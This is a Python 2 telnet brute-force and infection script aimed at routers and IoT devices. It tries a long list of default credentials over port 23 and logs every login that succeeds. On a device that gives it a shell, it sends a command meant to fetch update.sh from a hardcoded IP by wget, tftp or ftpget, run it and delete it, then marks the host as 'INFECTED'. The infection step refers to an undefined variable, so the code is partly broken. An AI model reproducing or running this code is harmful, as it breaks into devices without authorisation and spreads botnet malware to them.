1
#!/usr/bin/python
2
import threading
3
import sys, os, re, time, socket, select
4
from Queue import *
5
from sys import stdout
6

7
if len(sys.argv) < 4:
8
    print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
9
    sys.exit()
10

11
wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
12
tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
13
ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"
14

15
combo = [ 
16
        "root:root",
17
        "root:",
18
        "admin:admin",
19
        "support:support",
20
        "user:user",
21
        "admin:",
22
        "admin:password",
23
        "root:vizxv",
24
        "root:admin",
25
        "root:xc3511",
26
        "root:888888",
27
        "root:xmhdipc",
28
        "root:default",
29
        "root:juantech",
30
        "root:123456",
31
        "root:54321",
32
        "root:12345",
33
        "root:pass",
34
        "ubnt:ubnt",
35
        "root:klv1234",
36
        "root:Zte521",
37
        "root:hi3518",
38
        "root:jvbzd",
39
        "root:anko",
40
        "root:zlxx.",
41
        "root:7ujMko0vizxv",
42
        "root:7ujMko0admin",
43
        "root:system",
44
        "root:ikwb",
45
        "root:dreambox",
46
        "root:user",
47
        "root:realtek",
48
        "root:00000000",
49
        "admin:1111111",
50
        "admin:1234",
51
        "admin:12345",
52
        "admin:54321",
53
        "admin:123456",
54
        "admin:7ujMko0admin",
55
        "admin:1234",
56
        "admin:pass",
57
        "admin:meinsm",
58
        "admin:admin1234",
59
        "root:1111",
60
        "admin:smcadmin",
61
        "admin:1111",
62
        "root:666666",
63
        "root:password",
64
        "root:1234",
65
        "root:klv123",
66
        "Administrator:admin",
67
        "service:service",
68
        "supervisor:supervisor",
69
        "guest:guest",
70
        "guest:12345",
71
        "guest:12345",
72
        "admin1:password",
73
        "administrator:1234",
74
        "666666:666666",
75
        "888888:888888",
76
        "tech:tech",
77
        "mother:fucker"
78
]
79

80
ips = open(sys.argv[1], "r").readlines()
81
threads = int(sys.argv[2])
82
output_file = sys.argv[3]
83
queue = Queue()
84
queue_count = 0
85

86
for ip in ips:
87
    queue_count += 1
88
    stdout.write("\r[%d] Added to queue" % queue_count)
89
    stdout.flush()
90
    queue.put(ip)
91
print "\n"
92

93
def readUntil(tn, string, timeout=8):
94
    buf = ''
95
    start_time = time.time()
96
    while time.time() - start_time < timeout:
97
        buf += tn.recv(1024)
98
        time.sleep(0.1)
99
        if string in buf: return buf
100
    raise Exception('TIMEOUT!')
101

102
def recvTimeout(sock, size, timeout=8):
103
    sock.setblocking(0)
104
    ready = select.select([sock], [], [], timeout)
105
    if ready[0]:
106
        data = sock.recv(size)
107
        return data
108
    return ""
109

110
class router(threading.Thread):
111
    def __init__ (self, ip):
112
        threading.Thread.__init__(self)
113
        self.ip = str(ip).rstrip('\n')
114
    def run(self):
115
        global fh
116
        username = ""
117
        password = ""
118
        for passwd in combo:
119
            if ":n/a" in passwd:
120
                password=""
121
            else:
122
                password=passwd.split(":")[1]
123
            if "n/a:" in passwd:
124
                username=""
125
            else:
126
                username=passwd.split(":")[0]
127
            try:
128
                tn = socket.socket()
129
                tn.settimeout(1)
130
                tn.connect((self.ip,23))
131
            except Exception:
132
                tn.close()
133
                break
134
            try:
135
                hoho = ''
136
                hoho += readUntil(tn, ":")
137
                if ":" in hoho:
138
                    tn.send(username + "\n")
139
                    time.sleep(0.09)
140
            except Exception:
141
                tn.close()
142
            try:
143
                hoho = ''
144
                hoho += readUntil(tn, ":")
145
                if ":" in hoho:
146
                    tn.send(password + "\n")
147
                    time.sleep(0.8)
148
                else:
149
                    pass
150
            except Exception:
151
                tn.close()
152
            try:
153
                prompt = ''
154
                prompt += tn.recv(40960)
155
                if ">" in prompt and "ONT" not in prompt:
156
                    success = True
157
                elif "#" in prompt or "$" in prompt or "root@" in prompt or ">" in prompt:
158
                    success = True              
159
                else:
160
                    tn.close()
161
                if success == True:
162
                    try:
163
                        print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
164
                        fh.write(self.ip + ":23 " + username + ":" + password + "\n")
165
                        fh.flush()
166
                        tn.send("sh\r\n")
167
                        time.sleep(0.1)
168
                        tn.send("shell\r\n")
169
                        time.sleep(0.1)
170
                        tn.send("ls /\r\n")
171
                        time.sleep(1)
172
                        timeout = 8
173
                        buf = ''
174
                        start_time = time.time()
175
                        while time.time() - start_time < timeout:
176
                            buf += recvTimeout(tn, 40960)
177
                            time.sleep(0.1)
178
                            if "tmp" in buf and "unrecognized" not in buf:
179
                                tn.send(rekdevice + "\r\n")
180
                                print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
181
                                f = open("infected.txt", "a")
182
                                f.write(self.ip + ":23 " + username + ":" + password + "\n")
183
                                f.close()
184
                                time.sleep(10)
185
                                tn.close()
186
                                break
187
                        tn.close()
188
                        break
189
                    except:
190
                        tn.close()
191
                else:
192
                    tn.close()
193
            except Exception:
194
                tn.close()
195

196
def worker():
197
    try:
198
        while True:
199
            try:
200
                IP = queue.get()
201
                thread = router(IP)
202
                thread.start()
203
                queue.task_done()
204
                time.sleep(0.02)
205
            except:
206
                pass
207
    except:
208
        pass
209

210
global fh
211
fh = open(output_file, "a")
212
global active
213
active = 0
214

215
for l in xrange(threads):
216
    try:
217
        t = threading.Thread(target=worker)
218
        t.start()
219
    except:
220
        pass
221

222
print "Started " + str(threads) + " brute threads! Press enter to stop."
223
raw_input()
224
os.kill(os.getpid(), 9)
225